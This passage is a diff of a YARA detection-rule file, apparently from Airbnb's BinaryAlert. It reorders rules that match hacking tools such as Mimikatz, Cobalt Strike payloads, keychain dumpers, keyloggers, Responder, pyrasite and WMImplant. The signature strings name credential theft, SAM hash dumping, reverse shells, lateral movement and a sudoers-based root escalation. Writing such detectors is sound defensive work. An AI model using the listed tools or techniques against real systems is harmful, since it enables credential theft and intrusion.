-		md5_2 = "0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b"
-		md5_3 = "0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143"
-		md5_4 = "004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c"
-		md5_5 = "09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca"
-		md5_6 = "09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669"
 
 	strings:
-		$s1 = "Kiwi en C" fullword ascii wide
-		$s2 = "Benjamin DELPY `gentilkiwi`" fullword ascii wide
-		$s3 = "http://blog.gentilkiwi.com/mimikatz" fullword ascii wide
-		$s4 = "Build with love for POC only" fullword ascii wide
-		$s5 = "gentilkiwi (Benjamin DELPY)" fullword wide
-		$s6 = "KiwiSSP" fullword wide
-		$s7 = "Kiwi Security Support Provider" fullword wide
-		$s8 = "kiwi flavor !" fullword wide
+		$a1 = "%s/MacPmem.kext" wide ascii
+		$a2 = "The Pmem physical memory imager." wide ascii
+		$a3 = "The OSXPmem memory imager." wide ascii
+		$a4 = "These AFF4 Volumes will be loaded and their metadata will be parsed before the program runs." wide ascii
+		$a5 = "Pmem driver version incompatible. Reported" wide ascii
+		$a6 = "Memory access driver left loaded since you specified the -l flag." wide ascii
+		$b1 = "Unloading MacPmem" wide ascii
+		$b2 = "MacPmem load tag is" wide ascii
 
 	condition:
-		any of them
+		BINARYALERT_Macho_PRIVATE and 2 of ( $a* ) or all of ( $b* )
 }
-rule BINARYALERT_Hacktool_Windows_Cobaltstrike_Postexploitation : FILE
+rule BINARYALERT_Hacktool_Macos_Exploit_Tpwn
 {
 	meta:
-		description = "Detection of strings in the post-exploitation modules of Cobalt Strike"
-		author = "@javutin, @mimeframe"
-		id = "76c2a5ae-bc7c-50c7-8731-94c75912574f"
-		date = "2017-12-14"
-		modified = "2017-12-14"
-		reference = "https://www.cobaltstrike.com/support"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_cobaltstrike_postexploitation.yara#L1-L13"
+		description = "tpwn exploits a null pointer dereference in XNU to escalate privileges to root."
+		author = "@mimeframe"
+		id = "b69c4e1c-554e-5553-9b21-6cdf33aff24e"
+		date = "2017-09-14"
+		modified = "2017-09-14"
+		reference = "https://www.rapid7.com/db/modules/exploit/osx/local/tpwn"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_exploit_tpwn.yara#L1-L14"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "1a89128a0f5774d1333be440d38128e29cb36f9818fa44e60482ef078078aca8"
+		logic_hash = "f864d8c137746edd50526b1d3d95a7335f776cf1473d2d2ea28856dbc515dd9f"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$s1 = "\\devcenter\\aggressor\\external\\"
+		$a1 = "[-] Couldn't find a ROP gadget, aborting." wide ascii
+		$a2 = "leaked kaslr slide," wide ascii
+		$a3 = "didn't get root, but this system is vulnerable." wide ascii
+		$a4 = "Escalating privileges! -qwertyoruiop" wide ascii
 
 	condition:
-		filesize > 10KB and filesize < 1000KB and all of ( $s* )
+		2 of ( $a* )
 }
-rule BINARYALERT_Hacktool_Windows_Cobaltstrike_Powershell : FILE
+rule BINARYALERT_Hacktool_Macos_Ptoomey3_Keychain_Dumper
 {
 	meta:
-		description = "Detection of the PowerShell payloads from Cobalt Strike"
-		author = "@javutin, @joseselvi"
-		id = "155f181a-56cb-5295-a903-744f79012733"
-		date = "2017-12-14"
-		modified = "2017-12-14"
-		reference = "https://www.cobaltstrike.com/help-payload-generator"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_cobaltstrike_powershell.yara#L1-L21"
+		description = "Keychain dumping utility."
+		author = "@mimeframe"
+		id = "c45abbbe-f5fe-5a87-acd4-dcdb99ceec28"
+		date = "2017-09-12"
+		modified = "2017-09-12"
+		reference = "https://github.com/ptoomey3/Keychain-Dumper"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_ptoomey3_keychain_dumper.yara#L1-L15"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "39dd0aaa84d02aae5766d764c3d371f03f9df33acf5f6ae4ab4a8c73dd827213"
+		logic_hash = "f2ef979e4682ce617b37f7503ec2ca520e657b4f6d15a75afad59b62191a1a43"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$ps1 = "Set-StrictMode -Version 2"
-		$ps2 = "func_get_proc_address"
-		$ps3 = "func_get_delegate_type"
-		$ps4 = "FromBase64String"
-		$ps5 = "VirtualAlloc"
-		$ps6 = "var_code"
-		$ps7 = "var_buffer"
-		$ps8 = "var_hthread"
+		$a1 = "keychain_dumper" wide ascii
+		$a2 = "/var/Keychains/keychain-2.db" wide ascii
+		$a3 = "<key>keychain-access-groups</key>" wide ascii
+		$a4 = "SELECT DISTINCT agrp FROM genp UNION SELECT DISTINCT agrp FROM inet" wide ascii
+		$a5 = "dumpEntitlements" wide ascii
 
 	condition:
-		$ps1 at 0 and filesize < 1000KB and all of ( $ps* )
+		all of ( $a* )
 }
 rule BINARYALERT_Hacktool_Macos_Keylogger_Logkext
 {
@@ -68897,416 +68720,540 @@ rule BINARYALERT_Hacktool_Macos_Keylogger_Logkext
 	condition:
 		3 of ( $a* ) or all of ( $b* ) or all of ( $c* ) or all of ( $d* )
 }
-rule BINARYALERT_Hacktool_Macos_Exploit_Tpwn
+rule BINARYALERT_Hacktool_Macos_Keylogger_Roxlu_Ofxkeylogger
 {
 	meta:
-		description = "tpwn exploits a null pointer dereference in XNU to escalate privileges to root."
+		description = "ofxKeylogger keylogger."
 		author = "@mimeframe"
-		id = "b69c4e1c-554e-5553-9b21-6cdf33aff24e"
-		date = "2017-09-14"
-		modified = "2017-09-14"
-		reference = "https://www.rapid7.com/db/modules/exploit/osx/local/tpwn"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_exploit_tpwn.yara#L1-L14"
+		id = "c0e00b76-9623-5709-b64b-0afe006eba60"
+		date = "2017-09-12"
+		modified = "2017-09-12"
+		reference = "https://github.com/roxlu/ofxKeylogger"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_keylogger_roxlu_ofxkeylogger.yara#L1-L13"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "f864d8c137746edd50526b1d3d95a7335f776cf1473d2d2ea28856dbc515dd9f"
+		logic_hash = "6e2579a10327cc8f1799848b3bcbcd95733a31098faeb849df6ebf99f1ffe808"
 		score = 75
 		quality = 80
 		tags = ""
 
 	strings:
-		$a1 = "[-] Couldn't find a ROP gadget, aborting." wide ascii
-		$a2 = "leaked kaslr slide," wide ascii
-		$a3 = "didn't get root, but this system is vulnerable." wide ascii
-		$a4 = "Escalating privileges! -qwertyoruiop" wide ascii
+		$a1 = "keylogger_init" wide ascii
+		$a2 = "install_keylogger_hook function not found in dll." wide ascii
+		$a3 = "keylogger_set_callback" wide ascii
 
 	condition:
-		2 of ( $a* )
+		all of ( $a* )
 }
-rule BINARYALERT_Hacktool_Macos_Ptoomey3_Keychain_Dumper
+rule BINARYALERT_Hacktool_Multi_Ntlmrelayx
 {
 	meta:
-		description = "Keychain dumping utility."
+		description = "No description has been set in the source file - BinaryAlert"
 		author = "@mimeframe"
-		id = "c45abbbe-f5fe-5a87-acd4-dcdb99ceec28"
-		date = "2017-09-12"
-		modified = "2017-09-12"
-		reference = "https://github.com/ptoomey3/Keychain-Dumper"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_ptoomey3_keychain_dumper.yara#L1-L15"
+		id = "7e0bc28f-9cb7-5c09-aedc-d95af23454aa"
+		date = "2017-08-11"
+		modified = "2017-08-11"
+		reference = "https://github.com/CoreSecurity/impacket/blob/master/examples/ntlmrelayx.py"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/multi/hacktool_multi_ntlmrelayx.yara#L1-L15"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "f2ef979e4682ce617b37f7503ec2ca520e657b4f6d15a75afad59b62191a1a43"
+		logic_hash = "0d5d2d38866eb243e1803c456944e887d9d3920c54b15fd658bf90831fd87bfa"
 		score = 75
 		quality = 80
 		tags = ""
 
 	strings:
-		$a1 = "keychain_dumper" wide ascii
-		$a2 = "/var/Keychains/keychain-2.db" wide ascii
-		$a3 = "<key>keychain-access-groups</key>" wide ascii
-		$a4 = "SELECT DISTINCT agrp FROM genp UNION SELECT DISTINCT agrp FROM inet" wide ascii
-		$a5 = "dumpEntitlements" wide ascii
+		$a1 = "Started interactive SMB client shell via TCP" wide ascii
+		$a2 = "Service Installed.. CONNECT!" wide ascii
+		$a3 = "Done dumping SAM hashes for host:" wide ascii
+		$a4 = "DA already added. Refusing to add another" wide ascii
+		$a5 = "Domain info dumped into lootdir!" wide ascii
 
 	condition:
-		all of ( $a* )
+		any of ( $a* )
 }
-rule BINARYALERT_Hacktool_Macos_Keylogger_Skreweverything_Swift
+rule BINARYALERT_Hacktool_Multi_Responder_Py
 {
 	meta:
-		description = "It is a simple and easy to use keylogger for macOS written in Swift."
-		author = "@mimeframe"
-		id = "a4918bc3-d3f0-59f4-894f-fd34ee944fac"
-		date = "2017-09-12"
-		modified = "2017-09-12"
-		reference = "https://github.com/SkrewEverything/Swift-Keylogger"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_keylogger_skreweverything_swift.yara#L1-L15"
+		description = "Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server"
+		author = "@fusionrace"
+		id = "82699a67-8ba1-5535-9183-3c857e60134c"
+		date = "2017-08-11"
+		modified = "2017-08-11"
+		reference = "http://www.c0d3xpl0it.com/2017/02/compromising-domain-admin-in-internal-pentest.html"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/multi/hacktool_multi_responder_py.yara#L1-L17"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "f400b8ec392417e7443e82a2c2a9adfc868b9795aa1fb29f91d228f6f94efd13"
+		logic_hash = "a99a806b7c578af1f2163583f957db13fa7269c7426666189d85bec2ac87ad4b"
 		score = 75
 		quality = 80
 		tags = ""
 
 	strings:
-		$a1 = "Can't create directories!" wide ascii
-		$a2 = "Can't create manager" wide ascii
-		$a3 = "Can't open HID!" wide ascii
-		$a4 = "PRINTSCREEN" wide ascii
-		$a5 = "LEFTARROW" wide ascii
+		$s1 = "Poison all requests with another IP address than Responder's one." fullword ascii wide
+		$s2 = "Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned." fullword ascii wide
+		$s3 = "Enable answers for netbios wredir suffix queries. Answering to wredir will likely break stuff on the network." fullword ascii wide
+		$s4 = "This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query." fullword ascii wide
+		$s5 = "Upstream HTTP proxy used by the rogue WPAD Proxy for outgoing requests (format: host:port)" fullword ascii wide
+		$s6 = "31mOSX detected, -i mandatory option is missing" fullword ascii wide
+		$s7 = "This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query." fullword ascii wide
 
 	condition:
-		4 of ( $a* )
+		any of them
 }
-rule BINARYALERT_Hacktool_Macos_Macpmem
+rule BINARYALERT_Hacktool_Multi_Pyrasite_Py
 {
 	meta:
-		description = "MacPmem enables read/write access to physical memory on macOS. Can be used by CSIRT teams and attackers."
-		author = "@mimeframe"
-		id = "4890598e-936c-5a4d-9004-88ff4fe57c49"
+		description = "A tool for injecting arbitrary code into running Python processes."
+		author = "@fusionrace"
+		id = "0acd0044-a41c-5e9e-bb94-301cd704cf9d"
 		date = "2017-08-11"
 		modified = "2017-08-11"
-		reference = "https://github.com/google/rekall/tree/master/tools/osx/MacPmem"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_macpmem.yara#L3-L22"
+		reference = "https://github.com/lmacken/pyrasite"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/multi/hacktool_multi_pyrasite_py.yara#L1-L24"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "d64b5a5423932211e3b72d949028f3f0ed1f1435e9584cffa947f2bd4846c29b"
+		logic_hash = "7f3f3df5bd5c1bee2d85ff97878ad36223ab743926a5f8f1c079b039f724abc9"
 		score = 75
 		quality = 80
 		tags = ""
 
 	strings:
-		$a1 = "%s/MacPmem.kext" wide ascii
-		$a2 = "The Pmem physical memory imager." wide ascii
-		$a3 = "The OSXPmem memory imager." wide ascii
-		$a4 = "These AFF4 Volumes will be loaded and their metadata will be parsed before the program runs." wide ascii
-		$a5 = "Pmem driver version incompatible. Reported" wide ascii
-		$a6 = "Memory access driver left loaded since you specified the -l flag." wide ascii
-		$b1 = "Unloading MacPmem" wide ascii
-		$b2 = "MacPmem load tag is" wide ascii
+		$s1 = "WARNING: ptrace is disabled. Injection will not work." fullword ascii wide
+		$s2 = "A payload that connects to a given host:port and receives commands" fullword ascii wide
+		$s3 = "A reverse Python connection payload." fullword ascii wide
+		$s4 = "pyrasite - inject code into a running python process" fullword ascii wide
+		$s5 = "The ID of the process to inject code into" fullword ascii wide
+		$s6 = "This file is part of pyrasite." fullword ascii wide
+		$s7 = "https://github.com/lmacken/pyrasite" fullword ascii wide
+		$s8 = "Setup a communication socket with the process by injecting" fullword ascii wide
+		$s9 = "a reverse subshell and having it connect back to us." fullword ascii wide
+		$s10 = "Write out a reverse python connection payload with a custom port" fullword ascii wide
+		$s11 = "Wait for the injected payload to connect back to us" fullword ascii wide
+		$s12 = "PyrasiteIPC" fullword ascii wide
+		$s13 = "A reverse Python shell that behaves like Python interactive interpreter." fullword ascii wide
+		$s14 = "pyrasite cannot establish reverse" fullword ascii wide
 
 	condition:
-		BINARYALERT_Macho_PRIVATE and 2 of ( $a* ) or all of ( $b* )
+		any of them
 }
-rule BINARYALERT_Hacktool_Macos_Juuso_Keychaindump
+rule BINARYALERT_Hacktool_Multi_Jtesta_Ssh_Mitm
 {
 	meta:
-		description = "For reading OS X keychain passwords as root."
-		author = "@mimeframe"
-		id = "10ee6c24-db35-5178-9a40-92f5231948aa"
-		date = "2017-09-12"
-		modified = "2017-09-12"
-		reference = "https://github.com/juuso/keychaindump"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_juuso_keychaindump.yara#L1-L16"
+		description = "intercepts ssh connections to capture credentials"
+		author = "@fusionrace"
+		id = "fa8362e2-83d3-5830-8952-502684ad66f9"
+		date = "2017-08-11"
+		modified = "2017-08-11"
+		reference = "https://github.com/jtesta/ssh-mitm"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/multi/hacktool_multi_jtesta_ssh_mitm.yara#L1-L12"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "dd2fb6249fe4b7381e734ea3a308158159f7e79b39ba5c970241dcd66436d669"
+		logic_hash = "1d19c83f7d648a0d30074debcd76ff0faf72afa6722251661f8640abdc12a2a9"
+		score = 50
+		quality = 80
+		tags = ""
+
+	strings:
+		$a1 = "INTERCEPTED PASSWORD:" wide ascii
+		$a2 = "more sshbuf problems." wide ascii
+
+	condition:
+		all of ( $a* )
+}
+rule BINARYALERT_Hacktool_Multi_Bloodhound_Owned
+{
+	meta:
+		description = "Bloodhound: Custom queries to document a compromise, find collateral spread of owned nodes, and visualize deltas in privilege gains"
+		author = "@fusionrace"
+		id = "4d458339-6589-5094-8c23-1ad2baee19f1"
+		date = "2017-08-11"
+		modified = "2017-08-11"
+		reference = "https://github.com/porterhau5/BloodHound-Owned/"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/multi/hacktool_multi_bloodhound_owned.yara#L1-L20"
+		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
+		logic_hash = "01ef15a3cd606c46dacb0f22477fe97f94e212a38af1cd5bdd7eb11efe8144dd"
 		score = 75
 		quality = 80
 		tags = ""
 
 	strings:
-		$a1 = "[-] Too many candidate keys to fit in memory" wide ascii
-		$a2 = "[-] Could not allocate memory for key search" wide ascii
-		$a3 = "[-] Too many credentials to fit in memory" wide ascii
-		$a4 = "[-] The target file is not a keychain file" wide ascii
-		$a5 = "[-] Could not find the securityd process" wide ascii
-		$a6 = "[-] No root privileges, please run with sudo" wide ascii
+		$s1 = "Find all owned Domain Admins" fullword ascii wide
+		$s2 = "Find Shortest Path from owned node to Domain Admins" fullword ascii wide
+		$s3 = "List all directly owned nodes" fullword ascii wide
+		$s4 = "Set owned and wave properties for a node" fullword ascii wide
+		$s5 = "Find spread of compromise for owned nodes in wave" fullword ascii wide
+		$s6 = "Show clusters of password reuse" fullword ascii wide
+		$s7 = "Something went wrong when creating SharesPasswordWith relationship" fullword ascii wide
+		$s8 = "reference doc of custom Cypher queries for BloodHound" fullword ascii wide
+		$s9 = "Created SharesPasswordWith relationship between" fullword ascii wide
+		$s10 = "Skipping finding spread of compromise due to" fullword ascii wide
 
 	condition:
-		4 of ( $a* )
+		any of them
 }
-rule BINARYALERT_Hacktool_Macos_N0Fate_Chainbreaker
+rule BINARYALERT_Hacktool_Multi_Ncc_ABPTTS
 {
 	meta:
-		description = "chainbreaker can extract user credential in a Keychain file with Master Key or user password in forensically sound manner."
+		description = "Allows for TCP tunneling over HTTP"
 		author = "@mimeframe"
-		id = "565d31c6-8d80-534d-8acc-c01d7af4f8b3"
-		date = "2017-09-12"
-		modified = "2017-09-12"
-		reference = "https://github.com/n0fate/chainbreaker"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_n0fate_chainbreaker.yara#L1-L13"
+		id = "dd5f6316-9e51-5cc8-b293-dc33b09cc801"
+		date = "2017-08-11"
+		modified = "2017-08-11"
+		reference = "https://github.com/nccgroup/ABPTTS"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/multi/hacktool_multi_ncc_ABPTTS.yara#L1-L19"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "7aedf952756ed2375ff171329179f14a8cdc37ada69e1f003def1f1de5bc1691"
+		logic_hash = "09874b1d997ac193ad1afa0226f6fb22836c8720c0599d773b18072b92a3acc4"
 		score = 75
 		quality = 80
 		tags = ""
 
 	strings:
-		$a1 = "[!] Private Key Table is not available" wide ascii
-		$a2 = "[!] Public Key Table is not available" wide ascii
-		$a3 = "[-] Decrypted Private Key" wide ascii
+		$s1 = "---===[[[ A Black Path Toward The Sun ]]]===---" ascii wide
+		$s2 = "https://vulnerableserver/EStatus/" ascii wide
+		$s3 = "Error: no ABPTTS forwarding URL was specified. This utility will now exit." ascii wide
+		$s4 = "tQgGur6TFdW9YMbiyuaj9g6yBJb2tCbcgrEq" fullword ascii wide
+		$s5 = "63688c4f211155c76f2948ba21ebaf83" fullword ascii wide
+		$s6 = "ABPTTSClient-log.txt" fullword ascii wide
 
 	condition:
-		all of ( $a* )
+		any of them
 }
-rule BINARYALERT_Hacktool_Macos_Exploit_Cve_5889
+rule BINARYALERT_Hacktool_Multi_Masscan
 {
 	meta:
-		description = "No description has been set in the source file - BinaryAlert"
+		description = "masscan is a performant port scanner, it produces results similar to nmap"
 		author = "@mimeframe"
-		id = "ea70d31c-1b70-5927-ba8d-e13d2114e74e"
-		date = "2017-09-12"
-		modified = "2017-09-12"
-		reference = "https://www.exploit-db.com/exploits/38371/"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_exploit_cve_2015_5889.yara#L1-L16"
+		id = "adb2bb07-2a1a-5eb5-8049-b3f8e6cba48a"
+		date = "2017-08-11"
+		modified = "2017-08-11"
+		reference = "https://github.com/robertdavidgraham/masscan"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/multi/hacktool_multi_masscan.yara#L1-L17"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "b455759ea369cdcf2f05a2735a38000179ebe644667016cd635dfad9beda4459"
+		logic_hash = "b35e481f73b1c1722056157f8348e2e06bb109c094b948fc6be2d9a7df070a7f"
 		score = 75
 		quality = 80
 		tags = ""
 
 	strings:
-		$a1 = "/etc/sudoers" fullword wide ascii
-		$a2 = "/etc/crontab" fullword wide ascii
-		$a3 = "* * * * * root echo" wide ascii
-		$a4 = "ALL ALL=(ALL) NOPASSWD: ALL" wide ascii
-		$a5 = "/usr/bin/rsh" fullword wide ascii
-		$a6 = "localhost" fullword wide ascii
+		$a1 = "EHLO masscan" fullword wide ascii
+		$a2 = "User-Agent: masscan/" wide ascii
+		$a3 = "/etc/masscan/masscan.conf" fullword wide ascii
+		$b1 = "nmap(%s): unsupported. This code will never do DNS lookups." wide ascii
+		$b2 = "nmap(%s): unsupported, we do timing WAY different than nmap" wide ascii
+		$b3 = "[hint] I've got some local priv escalation 0days that might work" wide ascii
+		$b4 = "[hint] VMware on Macintosh doesn't support masscan" wide ascii
 
 	condition:
-		all of ( $a* )
+		all of ( $a* ) or any of ( $b* )
 }
-rule BINARYALERT_Hacktool_Macos_Keylogger_Eldeveloper_Keystats
+rule BINARYALERT_Hacktool_Windows_Cobaltstrike_Powershell : FILE
 {
 	meta:
-		description = "A simple keylogger for macOS."
+		description = "Detection of the PowerShell payloads from Cobalt Strike"
+		author = "@javutin, @joseselvi"
+		id = "155f181a-56cb-5295-a903-744f79012733"
+		date = "2017-12-14"
+		modified = "2017-12-14"
+		reference = "https://www.cobaltstrike.com/help-payload-generator"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_cobaltstrike_powershell.yara#L1-L21"
+		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
+		logic_hash = "39dd0aaa84d02aae5766d764c3d371f03f9df33acf5f6ae4ab4a8c73dd827213"
+		score = 75
+		quality = 80
+		tags = "FILE"
+
+	strings:
+		$ps1 = "Set-StrictMode -Version 2"
+		$ps2 = "func_get_proc_address"
+		$ps3 = "func_get_delegate_type"
+		$ps4 = "FromBase64String"
+		$ps5 = "VirtualAlloc"
+		$ps6 = "var_code"
+		$ps7 = "var_buffer"
+		$ps8 = "var_hthread"
+
+	condition:
+		$ps1 at 0 and filesize < 1000KB and all of ( $ps* )
+}
+rule BINARYALERT_Hacktool_Windows_Ncc_Wmicmd
+{
+	meta:
+		description = "Command shell wrapper for WMI"
 		author = "@mimeframe"
-		id = "7fddb502-ae2d-5e14-95f5-115498fa5926"
-		date = "2017-09-12"
-		modified = "2017-09-12"
-		reference = "https://github.com/ElDeveloper/keystats"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_keylogger_eldeveloper_keystats.yara#L1-L13"
+		id = "18bc36f7-b97a-5bce-a68b-c349713e9468"
+		date = "2017-08-11"
+		modified = "2017-08-11"
+		reference = "https://github.com/nccgroup/WMIcmd"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_ncc_wmicmd.yara#L1-L18"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "c73f5ca2ba0a1bde7c1f9b96173938e40511e12f875c4d850d6d498c63e89385"
+		logic_hash = "bef6828a706dcfc3b573523fccd391a5ef3fa505235b1621a82527d64d32aaf0"
 		score = 75
 		quality = 80
 		tags = ""
 
 	strings:
-		$a1 = "YVBKeyLoggerPerishedNotification" wide ascii
-		$a2 = "YVBKeyLoggerPerishedByLackOfResponseNotification" wide ascii
-		$a3 = "YVBKeyLoggerPerishedByUserChangeNotification" wide ascii
+		$a1 = "Need to specify a username, domain and password for non local connections" wide ascii
+		$a2 = "WS-Management is running on the remote host" wide ascii
+		$a3 = "firewall (if enabled) allows connections" wide ascii
+		$a4 = "WARNING: Didn't see stdout output finished marker - output may be truncated" wide ascii
+		$a5 = "Command sleep in milliseconds - increase if getting truncated output" wide ascii
+		$b1 = "0x800706BA" wide ascii
+		$b2 = "NTLMDOMAIN:" wide ascii
+		$b3 = "cimv2" wide ascii
 
 	condition:
-		2 of ( $a* )
+		any of ( $a* ) or all of ( $b* )
 }
-rule BINARYALERT_Hacktool_Macos_Keylogger_B4Rsby_Swiftlog
+rule BINARYALERT_Hacktool_Windows_Wmi_Implant
 {
 	meta:
-		description = "Dirty user level command line keylogger hacked together in Swift."
-		author = "@mimeframe"
-		id = "b1ae8284-04a0-5818-9997-0e31eb51ed2b"
-		date = "2017-09-12"
-		modified = "2017-09-12"
-		reference = "https://github.com/b4rsby/SwiftLog"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_keylogger_b4rsby_swiftlog.yara#L1-L11"
+		description = "A PowerShell based tool that is designed to act like a RAT"
+		author = "@fusionrace"
+		id = "cd90ef31-6e15-5518-8278-98e99e379916"
+		date = "2017-08-11"
+		modified = "2017-08-11"
+		reference = "https://www.fireeye.com/blog/threat-research/2017/03/wmimplant_a_wmi_ba.html"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_wmi_implant.yara#L1-L21"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "c66dcab2da0e543198f97ca104c13533c8950d10b6f7cbd3f906348d0f8c45ff"
+		logic_hash = "8b02fd265b04b9675a99b9638fdd179c8a86ed3afd7506195f3d3dcb2417d74d"
 		score = 75
 		quality = 80
 		tags = ""
 
 	strings:
-		$a1 = "You need to enable the keylogger in the System Prefrences" wide ascii
+		$s1 = "This really isn't applicable unless you are using WMImplant interactively." fullword ascii wide
+		$s2 = "What command do you want to run on the remote system? >" fullword ascii wide
+		$s3 = "Do you want to [create] or [delete] a string registry value? >" fullword ascii wide
+		$s4 = "Do you want to run a WMImplant against a list of computers from a file? [yes] or [no] >" fullword ascii wide
+		$s5 = "What is the name of the service you are targeting? >" fullword ascii wide
+		$s6 = "This function enables the user to upload or download files to/from the attacking machine to/from the targeted machine" fullword ascii wide
+		$s7 = "gen_cli - Generate the CLI command to execute a command via WMImplant" fullword ascii wide
+		$s8 = "exit - Exit WMImplant" fullword ascii wide
+		$s9 = "Lateral Movement Facilitation" fullword ascii wide
+		$s10 = "vacant_system - Determine if a user is away from the system." fullword ascii wide
+		$s11 = "Please provide the ProcessID or ProcessName flag to specify the process to kill!" fullword ascii wide
 
 	condition:
-		all of ( $a* )
+		any of them
 }
-rule BINARYALERT_Hacktool_Macos_Keylogger_Giacomolaw
+rule BINARYALERT_Hacktool_Windows_Mimikatz_Errors
 {
 	meta:
-		description = "A simple keylogger for macOS."
-		author = "@mimeframe"
-		id = "81fcf792-a0a9-5b97-a71c-4c517a7b910c"
-		date = "2017-09-12"
-		modified = "2017-09-12"
-		reference = "https://github.com/GiacomoLaw/Keylogger"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_keylogger_giacomolaw.yara#L1-L13"
+		description = "Mimikatz credential dump tool: Error messages"
+		author = "@fusionrace"
+		id = "94d50739-fc84-5bfe-821d-5e2851f681e3"
